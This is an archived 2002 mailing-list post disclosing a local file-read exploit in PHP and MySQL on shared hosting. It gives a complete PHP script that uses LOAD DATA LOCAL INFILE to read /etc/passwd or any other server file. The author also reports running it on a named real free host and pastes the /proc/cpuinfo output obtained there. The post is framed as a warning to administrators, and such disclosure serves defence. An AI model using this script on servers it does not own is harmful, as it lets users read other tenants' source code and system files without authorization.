File reading vulnerable in PHP and MySQL (Local Exploit)

From: Hai Nam Luke (hainamlukeat_private)
Date: Tue Nov 26 2002 - 02:57:52 PST

  • Next message: zel: "Netscreen Malicious URL feature can be bypassed by fragmenting the request" 

    
 ('binary' encoding is not supported, stored as-is)
Attacker can use PHP and mySQL to read some local file following this way:

# Create a database (mySQL) and upload this file to your server
PHP Code: viewfile.php (programmed by Luke)

======================================================
<?
// config this data
$dbhost = "";
$dbuser = "";
$dbpasswd = "";
$dbname = "";
$file = "/etc/passwd"; // filename that you wanna view 

// shell code
        echo "<pre>";

                                mysql_connect ($dbhost, $dbuser, 
$dbpasswd);
                                $sql = array (
                                   "USE $dbname",

                                   'CREATE TEMPORARY TABLE ' . ($tbl 
= 'A'.time
()) . ' (a LONGBLOB)',

                                   "LOAD DATA LOCAL INFILE '$file' INTO 
TABLE
$tbl FIELDS "
                                   . "TERMINATED BY      
'__THIS_NEVER_HAPPENS__' "
                                   . "ESCAPED BY          '' "
                                   . "LINES TERMINATED BY
'__THIS_NEVER_HAPPENS__'",

                                   "SELECT a FROM $tbl LIMIT 1"
                                );


                                foreach ($sql as $statement) {
                                   $query = mysql_query ($statement);

                                   if ($query == false) die (
                                      "FAILED: " . $statement . "\n" .
                                      "REASON: " . mysql_error () . "\n"
                                   );

                                   if (! $r = @mysql_fetch_array ($query,
MYSQL_NUM)) continue;

                                   echo htmlspecialchars($r[0]);
                                   mysql_free_result ($query);
                                }
    echo "</pre>";
?>

======================================================

You'll recived all source of /etc/passwd

This vulnerable is very dangerous because user can read some important 
file in your server. Especially, at any free host, user can use local 
exploit to read source code of other user and attack one another.

Example: I uploaded this file and config it at http://members.lycos.co.uk/ 
and I
was recived their file: "/proc/cpuinfo" :

==============================================================
processor	: 0
vendor_id	: GenuineIntel
cpu family	: 6
model		: 8
model name	: Pentium III (Coppermine)
stepping	: 10
cpu MHz		: 997.531
cache size	: 256 KB
fdiv_bug	: no
hlt_bug		: no
f00f_bug	: no
coma_bug	: no
fpu		: yes
fpu_exception	: yes
cpuid level	: 2
wp		: yes
flags		: fpu vme de pse tsc msr pae mce cx8 apic sep mtrr pge mca 
cmov pat pse36
mmx fxsr sse
bogomips	: 1992.29

processor	: 1
vendor_id	: GenuineIntel
cpu family	: 6
model		: 8
model name	: Pentium III (Coppermine)
stepping	: 10
cpu MHz		: 997.531
cache size	: 256 KB
fdiv_bug	: no
hlt_bug		: no
f00f_bug	: no
coma_bug	: no
fpu		: yes
fpu_exception	: yes
cpuid level	: 2
wp		: yes
flags		: fpu vme de pse tsc msr pae mce cx8 apic sep mtrr pge mca 
cmov pat pse36
mmx fxsr sse
bogomips	: 1992.29
==============================================================

And many another files, please check your server !
Thank to dodo. Sorry for my poor English !

Luke (HVA)
http://www.hackervn.net

    

    



    

    


This archive was generated by hypermail 2b30 
: Sat Nov 30 2002 - 12:42:27 PST